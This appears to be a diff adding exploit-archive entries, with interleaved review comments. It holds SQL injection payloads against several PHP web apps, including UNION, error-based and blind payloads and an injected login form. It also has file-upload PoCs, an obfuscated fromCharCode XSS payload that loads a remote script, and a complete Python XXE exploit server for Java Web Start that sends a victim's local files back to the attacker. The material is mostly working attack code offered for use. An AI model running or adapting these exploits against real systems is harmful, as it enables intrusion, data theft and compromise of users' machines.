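+# -9553'++/*!50000UNION*/+/*!50000SELECT*/+1,2,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+#
+# Parameter: sc (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: sc=12c4ca4238a0b923820dcc509a6f75849b' AND 5747=5747 AND 'tzJH'='tzJH
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 10 columns
+# Payload: sc=-5921' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x74624c4f7167546e4676635467647269456244634147776d584b77796e4870674661646a7a44485a,0x717a6a7a71),NULL,NULL,NULL-- bjaB
+#
+# Etc..
+# # # # #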
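--- a/platforms/php/webapps/43097.txt
+++ b/platforms/php/webapps/43097.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: iStock Management System 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://ikodes.com/
+# Software Link: https://codecanyon.net/item/istock-management-system/20405084
+# Demo: http://project.ikodes.com/basicims/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15962
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users upload arbitrary file....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/user/profile
+# http://localhost/[PATH]//assets/images/[FILE]
+#
+# Etc..
+# # # # #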
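--- a/platforms/php/webapps/43098.txt
+++ b/platforms/php/webapps/43098.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: iProject Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://ikodes.com/
+# Software Link: https://codecanyon.net/item/iproject-management-system/20483358
+# Demo: http://project.ikodes.com/ikpms/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15961
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?cmd=agent&mod=true&ID=[SQL]
+# http://localhost/[PATH]/index.php?cmd=client_master&mod=true&ID=[SQL]
+#
+# Etc..
+# # # # #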
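--- a/platforms/php/webapps/43099.txt
+++ b/platforms/php/webapps/43099.txt
@@ -0,0 +1,43 @@
+# # # # #
+# Exploit Title: Article Directory Script 3.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.yourarticlesdirectory.com/
+# Software Link: http://www.yourarticlesdirectory.com/
+# Demo: http://www.yourarticlesdirectory.com/livedemo.php
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15960
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/category.php?id=[SQL]
+#
+# 18++/*!02222UniOn*/+(/*!02222SeleCt*/+0x283129,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--+-
+#
+# http://localhost/[PATH]/author.php?id=[SQL]
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: id=18 AND 8646=8646
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: id=18 AND SLEEP(5)
+#
+# Parameter: id (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: id=27 AND SLEEP(5)
+#
+# Etc..
+# # # # #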
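Review bot: Two result blocks are both headed `Parameter: id (GET)` without saying which script each belongs to; from the PoC list the first presumably corresponds to `category.php?id=` (its payloads use `id=18`, the same value as the UNION line above) and the second to `author.php?id=` (`id=27`), but the text never states this. Whoever fixes the application, or writes a detection rule, has to guess the mapping. Prefix each block with its endpoint, e.g. `# category.php` before the first and `# author.php` before the second.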
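--- a/platforms/php/webapps/43100.txt
+++ b/platforms/php/webapps/43100.txt
@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: Adult Script Pro 2.2.4 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.adultscriptpro.com/
+# Software Link: http://www.adultscriptpro.com/order.html
+# Demo: http://www.adultscriptpro.com/demo.html
+# Version: 2.2.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15959
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/download/[SQL]
+#
+# VerAyari+aNd(SELeCT+1+FroM(SeLECT+CoUNT(*),CoNCat((SeLECT+(SELECT+CoNCat(CaST(VERSIoN()+aS+ChaR),0x7e,0x496873616E53656e63616e))+FroM+INFoRMaTIoN_SChEMa.TaBLES+LIMIT+0,1),FLooR(RaNd(0)*2))x+FroM+INFoRMaTIoN_SChEMa.TaBLES+GRoUP+BY+x)a)
+#
+# Parameter: #1* (URI)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: http://localhost/[PATH]/download/Verayari AND (SELECT 4247 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(4247=4247,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Etc..
+# # # # #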
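--- a/platforms/php/webapps/43101.txt
+++ b/platforms/php/webapps/43101.txt
@@ -0,0 +1,29 @@
+<!--
+# # # # #
+# Exploit Title: D-Park Pro Domain Parking Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.domainzaar.com/
+# Software Link: http://www.domainzaar.com/
+# Demo: http://www.d-park-pro.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15958
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# # # # #
+-->
+<form id="loginform" action="http://localhost/[PATH]/admin/loginform.php" method="post">
+<label for="form_username">Username:</label>
+<input type="text" name="username" value="' UNION ALL SELECT 0x31,0x32,0x33,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari" />
+<label for="form_password">Password:</label>
+<input type="password" name="password" id="form_password" />
+<input name="login" value="Log In" type="submit">
+</form>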
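--- a/platforms/php/webapps/43102.txt
+++ b/platforms/php/webapps/43102.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Ingenious School Management System 2.3.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://iloveprograming.com/
+# Software Link: https://www.codester.com/items/4945/ingenious-school-management-system
+# Demo: http://iloveprograming.com/view/login.php
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15957
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+#
+# The vulnerability allows an student,teacher upload arbitrary file....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/my_profile.php
+# http://localhost/[PATH]/uploads/[FILE]
+#
+# Etc..
+# # # # #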
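Review bot: The title says `2.3.0` but the header reads `# Version: N/A`; one of the two should be corrected so the affected range is unambiguous. Neither this entry nor 43097 (iStock Management System) says which control the profile upload lacks — an extension allow-list, a server-side content check, or storage outside the web root — so a vendor or downstream packager cannot verify a fix against the advisory; a sentence in the description naming the missing check would make both entries actionable, e.g. `# The profile picture upload does not restrict the file extension and stores the file under the web root.` if that is what was observed. The `# Description:` block here also has a stray `#` line between the heading and the sentence that the other entries do not have.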
@ -104,7 +104,7 @@ function x() {
<br />
<br />
<br />
<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
</body>
</html>
158
platforms/xml/webapps/43103.py
@ -0,0 +1,158 @@
#!/usr/local/bin/python
"""
Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability
Affected: <= v8u131
File: jre-8u131-windows-i586-iftw.exe
SHA1: 85f0de19845deef89cc5a29edebe5bb33023062d
Download: http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html
References: SRC-2017-0028 / CVE-2017-10309
Advisory: http://srcincite.io/advisories/src-2017-0028/
Vulnerability Details:
======================
Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'.
This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack to be leveraged to disclose files, cause a denial of service or trigger SSRF.
Notes:
======
- It will take a few seconds to fire.
- Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all.
Example:
========
saturn:~ mr_me$ ./poc.py
Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
mr_me 2017
(+) usage: ./poc.py <file>
(+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
mr_me 2017
(+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, tap0: vmnet8
(+) starting xxe server...
(+) have someone with Java SE installed visit: http://172.16.175.1:9090/
(!) firing webstart...
(!) downloading jnlp...
(!) downloading si.xml...
(+) stolen: Please%20refer%20to%20http://java.com/licensereadme
^C(+) shutting down the web server
saturn:~ mr_me$
"""
import sys
import socket
import fcntl
import struct
from random import choice
from string import lowercase
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
try:
    import netifaces as ni
except:
    # netifaces is the only third-party dependency; __main__ uses it to list
    # interfaces and to resolve the chosen one to an IPv4 address. The bare
    # except also catches SystemExit/KeyboardInterrupt, though the only
    # failure expected here is ImportError.
    print "(-) try 'pip install netifaces'"
    sys.exit(1)
class xxe(BaseHTTPRequestHandler):
    """Request handler that serves each stage of the JNLP XXE chain described
    in the module docstring.

    Reads three module-level names assigned under ``__main__``: ``ip`` (the
    address embedded in every served URL), ``path`` (the randomised ``.jnlp``
    filename) and ``file`` (the path to be read on the machine running Java
    Web Start). Every response is a bare ``200`` with no Content-Type header.
    Python 2 only (``print`` statements, ``BaseHTTPServer``).
    """

    # stfu
    def log_message(self, format, *args):
        # Suppress BaseHTTPRequestHandler's default per-request stderr log;
        # do_GET prints its own progress lines instead.
        return

    def do_GET(self):
        """Serve whichever stage matches ``self.path``.

        In the order Java Web Start fetches them: the landing page (``/``)
        with a hidden ``jnlp://`` iframe, the ``.jnlp`` file whose DOCTYPE
        loads an external parameter entity, ``si.xml`` (the external DTD
        defining the file and exfiltration entities) and finally the
        ``leaked`` callback carrying the file contents in the query string.
        The ``leaked`` test comes first so the callback URL is never mistaken
        for another stage. Any other path falls through and returns without
        writing a response.
        """

        if "leaked" in self.path:
            # Final stage: the exfiltrated content arrives as the query string.
            # NOTE(review): split("?")[1] raises IndexError when the request
            # carries no query string; nothing guards against that here.
            print "(+) stolen: %s" % self.path.split("?")[1]
            self.send_response(200)
            self.end_headers()

        elif self.path == "/":
            # Landing page: a zero-size iframe whose jnlp:// URL is handed to
            # the protocol handler Java SE registers (see module docstring).
            print "(!) firing webstart..."
            self.send_response(200)
            self.end_headers()
            message = """
<html>
<body>
<iframe src="jnlp://%s:9090/%s" style="width:0;height:0;border:0; border:none;"></iframe>
</body>
</html>
""" % (ip, path)
            self.wfile.write(message)
            self.wfile.write('\n')

        elif "si.xml" in self.path:
            # External DTD: ``data`` resolves the target file, ``param1``
            # defines ``exfil``, which points back at /leaked on this server.
            # ``%%`` is a literal percent sign under Python %-formatting.
            # NOTE(review): as rendered here, "% e" in the second ENTITY line is
            # itself a %-format directive (space flag, 'e' conversion) and would
            # raise TypeError for a str argument; the page rendering may have
            # altered this line - compare with the original source.
            print "(!) downloading si.xml..."
            self.send_response(200)
            self.end_headers()
            message = """
<!ENTITY %% data SYSTEM "file:///%s">
<!ENTITY %% param1 "<!ENTITY % exfil SYSTEM 'http://%s:9090/leaked?%%data;'>">
""" % (file, ip)
            self.wfile.write(message)
            self.wfile.write('\n')

        elif path in self.path:
            # The .jnlp itself: only a DOCTYPE is served, no <jnlp> element.
            # Parameter entity ``sp`` pulls si.xml over HTTP, then ``param1``
            # and ``exfil`` are expanded in turn.
            print "(!) downloading jnlp..."
            self.send_response(200)
            self.end_headers()
            message = """
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY %% sp SYSTEM "http://%s:9090/si.xml">
%%sp;
%%param1;
%%exfil;
]>
""" % ip
            self.wfile.write(message)
            self.wfile.write('\n')
        return
def banner():
    """Return the start-up banner: a leading newline, then two tab-indented lines."""
    title = "Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability"
    author = "mr_me 2017"
    return "\n\t" + title + "\n\t" + author + "\n"
if __name__ == '__main__':

    print banner()

    if len(sys.argv) != 2:
        print "(+) usage: %s <file>" % sys.argv[0]
        print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0]
        sys.exit(1)

    # Path the DTD's file:/// entity will read; consumed by xxe.do_GET through
    # the module-level name (note this shadows the builtin ``file``).
    file = sys.argv[1]

    # randomize incase we change payloads and browser caches
    path = "".join(choice(lowercase) for i in range(10))
    path += ".jnlp"

    # interfaces
    ints = ""
    for i in ni.interfaces(): ints += "%s, " % i
    # [:-2] drops the trailing ", " from the last interface name.
    interface = raw_input("(+) select your interface: %s: " % ints[:-2])

    # get the ip from the interface
    # Address family 2 is AF_INET on Linux/macOS: first IPv4 address only.
    try:
        ip = ni.ifaddresses(interface)[2][0]['addr']
    except:
        # KeyError/IndexError when the interface has no IPv4 address; the bare
        # except also swallows whatever netifaces raises for an unknown name.
        print "(-) no ip address associated with that interface!"
        sys.exit(1)
    print "jnlp://%s:9090/%s" % (ip, path)
    try:
        # Listens on every interface, not just the selected one; ``ip`` only
        # decides which address is embedded in the served URLs.
        server = HTTPServer(('0.0.0.0', 9090), xxe)
        print '(+) starting xxe server...'
        print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip
        server.serve_forever()

    except KeyboardInterrupt:
        # Ctrl-C is the only way out of serve_forever(); close the listening
        # socket so the port is released promptly.
        print '(+) shutting down the web server'
        server.socket.close()